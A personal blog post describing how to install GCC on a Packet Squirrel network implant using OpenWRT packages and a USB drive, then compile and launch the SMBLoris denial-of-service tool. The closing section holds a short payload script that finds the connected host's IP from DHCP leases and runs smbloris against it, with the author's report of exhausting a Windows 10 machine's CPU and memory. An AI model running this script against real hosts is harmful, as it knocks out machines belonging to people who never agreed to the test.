Packet Squirrel GCC and SMBLoris

Since the hardware footprint of the Packet Squirrel is so limited (2 MB for root filesystem  / and 30 MB for tempfs  /tmp) I have decided to find a way how to get GCC compiler and the needed libraries onto the Packet Squirrel without the native opkg package manager.

I have attached an 8 GB USB flash drive to the Packet Squirrel and formatted it from there as EXT4 /dev/sda1 partition

Disk /dev/sda: 7807 MB, 7807401984 bytes
250 heads, 5 sectors/track, 12199 cylinders
Units = cylinders of 1250 * 512 = 640000 bytes

Device Boot Start End Blocks Id System
/dev/sda1 1 12199 7624372+ 83 Linux

/dev/sda1 gets automounted on /mnt upon boot so we can use this extra space for the GCC and other dependencies

Since I did not want to go through the cross-compilation on my x86_64 Linux machine to get the mips binaries I have downloaded the precompiled packages from OpenWRT to my x86_64 Linux laptop

https://downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/

The following packages are needed to get C code to compile natively on the Packet Squirrel

wget https://downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/libbfd_2.24-3_ar71xx.ipk
wget https://downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/libopcodes_2.24-3_ar71xx.ipk
wget https://downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/objdump_2.24-3_ar71xx.ipk
wget https://downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/binutils_2.24-3_ar71xx.ipk
wget https://downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/packages/gcc_4.8.3-1_ar71xx.ipk

Once the packages are downloaded upload them via scp to the Packet Squirrel to the /mnt partition

scp *.ipk root@172.16.32.1:/mnt/

Login to the Packet Squirrel via ssh

ssh root@172.16.32.1 
root@squirrel:~# mkdir /mnt/tt 
root@squirrel:~# mv /mnt/*.ipk /mnt/tt
root@squirrel:~#

And here is what I did with each ipk package separately on the /mnt/tt
The below is pretty self explanatory, since the ipk is a Gzipped Tarball really
containing other tarballs.

root@squirrel:/mnt/tt# mv libbfd_2.24-3_ar71xx.ipk libbfd_2.24-3_ar71xx.tar.gz
root@squirrel:/mnt/tt# rm -rf b2/
root@squirrel:/mnt/tt# gunzip libbfd_2.24-3_ar71xx.tar.gz 
root@squirrel:/mnt/tt# tar -xvf libbfd_2.24-3_ar71xx.tar 
./debian-binary
./data.tar.gz
./control.tar.gz

We are only interested in the data.tar.gz which contains the compiled binaries
and libraries, so we create a directory called libbfd and move the
data.tar.gz there for extraction

root@squirrel:/mnt/tt# rm debian-binary 
root@squirrel:/mnt/tt# rm control.tar.gz 
root@squirrel:/mnt/tt# rm libbfd_2.24-3_ar71xx.tar 
root@squirrel:/mnt/tt# mkdir libbfd
root@squirrel:/mnt/tt# mv data.tar.gz libbfd/
root@squirrel:/mnt/tt# cd libbfd/
root@squirrel:/mnt/tt/libbfd# ls
data.tar.gz
root@squirrel:/mnt/tt/libbfd# tar -zxvf data.tar.gz 
./
./usr/
./usr/lib/
./usr/lib/libbfd-2.24.so
./usr/lib/libbfd.s
root@squirrel:/mnt/tt/libbfd# ls -la
drwxr-xr-x 3 root root 4096 Jul 14 02:11 .
drwxr-xr-x 7 root root 4096 Jul 14 02:10 ..
-rw-r--r-- 1 107 111 393581 Jan 31 2016 data.tar.gz
drwxr-xr-x 3 root root 4096 Jul 14 02:11 usr
root@squirrel:/mnt/tt/libbfd# rm data.tar.gz 
root@squirrel:/mnt/tt/libbfd# cd usr/
root@squirrel:/mnt/tt/libbfd/usr# cd lib/
root@squirrel:/mnt/tt/libbfd/usr/lib# ls -al
drwxr-xr-x 2 root root 4096 Jul 14 02:11 .
drwxr-xr-x 3 root root 4096 Jul 14 02:11 ..
-rwxr-xr-x 1 root root 935260 Jan 31 2016 libbfd-2.24.so
lrwxrwxrwx 1 root root 14 Jul 14 02:11 libbfd.so -> libbfd-2.24.so

Next we need to create symlinks from the / root filesystem to the extracted binaries
and libraries on the /mnt USB Flash partition

root@squirrel:/mnt/tt/libbfd/usr/lib# pwd
/mnt/tt/libbfd/usr/lib
root@squirrel:/mnt/tt/libbfd/usr/lib# ln -s /mnt/tt/libbfd/usr/lib/libbfd-2.24.so /usr
/lib/libbfd-2.24.so
root@squirrel:/mnt/tt/libbfd/usr/lib# ln -s /mnt/tt/libbfd/usr/lib/libbfd-2.24.so /usr
/lib/libbfd.so

We repeat the same process for the following packages

binutils_2.24-3_ar71xx.ipk
objdump_2.24-3_ar71xx.ipk
libopcodes_2.24-3_ar71xx.ipk

Once we are done with these we can finally move on to the extraction of GCC ipk package

root@squirrel:/mnt/tt/gcc/usr# ls -al
drwxr-xr-x 5 root root 4096 Jul 14 02:06 .
drwxr-xr-x 3 root root 4096 Jul 14 02:39 ..
drwxr-xr-x 2 root root 4096 Jul 14 02:06 bin
drwxr-xr-x 3 root root 4096 Jul 14 02:06 include
drwxr-xr-x 3 root root 4096 Jul 14 02:06 lib

root@squirrel:/mnt/tt/gcc/usr/include# ls -al 
drwxr-xr-x 3 root root 4096 Jul 14 02:06 .
drwxr-xr-x 5 root root 4096 Jul 14 02:06 ..
drwxr-xr-x 3 root root 4096 Jul 14 02:06 c++

So we create a complete directory symlink to /mnt/tt/gcc/include
from /usr on the root filesystem of Packet Squirrel like so

root@squirrel:/mnt/tt/gcc/usr/include# ls -la include
lrwxrwxrwx 1 root root 25 Jul 14 02:11 include -> /mnt/tt/gcc/usr/include/

Next we do the same for the /mnt/tt/gcc/usr/lib/gcc directory

root@squirrel:/mnt/tt/gcc/usr/lib# ls -al
drwxr-xr-x 3 root root 4096 Jul 14 02:06 .
drwxr-xr-x 5 root root 4096 Jul 14 02:06 ..
drwxr-xr-x 3 root root 4096 Jul 14 02:06 gcc

root@squirrel:/usr/lib# ls -la gcc
lrwxrwxrwx 1 root root 25 Jul 14 02:11 gcc -> /disk/tt/gcc/usr/lib/gcc/

So by now you should have a fully working GCC compiler on the Packet Squirrel , you can try run/compile some code (SMBLoris.c for example) that you scp to the device

root@squirrel:/mnt/tt/gcc/usr/bin# ./gcc -v
Using built-in specs.
COLLECT_GCC=./gcc
COLLECT_LTO_WRAPPER=/mnt/tt/gcc/usr/bin/../lib/gcc/mips-openwrt-linux-uclibc/4.8.3/lto-wrapper
Target: mips-openwrt-linux-uclibc
Configured with: /home/buildbot/slave-local/ar71xx_generic/build/build_dir/target-mips_34kc_uClibc-0.9.33.2/gcc-4.8.3/configure --target=mips-openwrt-linux --host=mips-openwrt-linux --build=x86_64-linux-gnu --program-prefix= --program-suffix= --prefix=/usr --exec-prefix=/usr --bindir=/usr/bin --sbindir=/usr/sbin --libexecdir=/usr/lib --sysconfdir=/etc --datadir=/usr/share --localstatedir=/var --mandir=/usr/man --infodir=/usr/info --disable-nls --build=x86_64-linux-gnu --host=mips-openwrt-linux-uclibc --target=mips-openwrt-linux-uclibc --enable-languages=c,c++ --with-bugurl=https://dev.openwrt.org/ --with-pkgversion='OpenWrt GCC 4.8.3' --enable-shared --disable-__cxa_atexit --enable-target-optspace --with-gnu-ld --disable-nls --disable-libmudflap --disable-multilib --disable-libgomp --disable-libquadmath --disable-libssp --disable-decimal-float --disable-libstdcxx-pch --with-host-libstdcxx=-lstdc++ --prefix=/usr --libexecdir=/usr/lib --with-float=soft
Thread model: posix
gcc version 4.8.3 (OpenWrt GCC 4.8.3)
root@squirrel:/mnt/tt/gcc/usr/bin#./gcc /mnt/smbloris.c -o /mnt/smbloris

The smbloris.c is taken from Hector Marcan’s github here https://gist.github.com/marcan/6a2d14b0e3eaa5de1795a763fb58641e#file-smbloris-c

The following Packet Squirrel code can be used to launch SMBLoris attack from this device onto the local network on which it is connected, set it to switch 1/2/3


# Show SETUP LED 
LED SETUP 
# Set the network mode to NAT 
NETMODE NAT 
sleep 5

# You may want to increase your local conntrack limit
echo 1200000 > /proc/sys/net/netfilter/nf_conntrack_max

# Get the IP address for the connected target machine 
ip="$(cat /var/dhcp.leases | awk '{print $3}')"

# Execute smbloris against the target IP 
/mnt/smbloris eth0 1.1.1.1 255.255.255.254 $ip &

I have tested this against the latest Windows 10 64bit  version 10.0.16299.19 on a physical hardware, the CPU gets to 100 %, memory jumps high as you can see on the video below

Im sure there might be some other tools that can be used in a similar manner (Exploit code written in C for example and compiled on the Packet Squirrel.. the possibilities are endless)

Nevertheless this was a fun exercise

Advertisement

About astr0baby

Please run Adblock or similar... we have been told to do so since Carl Sagan wrote the Contact .
This entry was posted in Uncategorized. Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.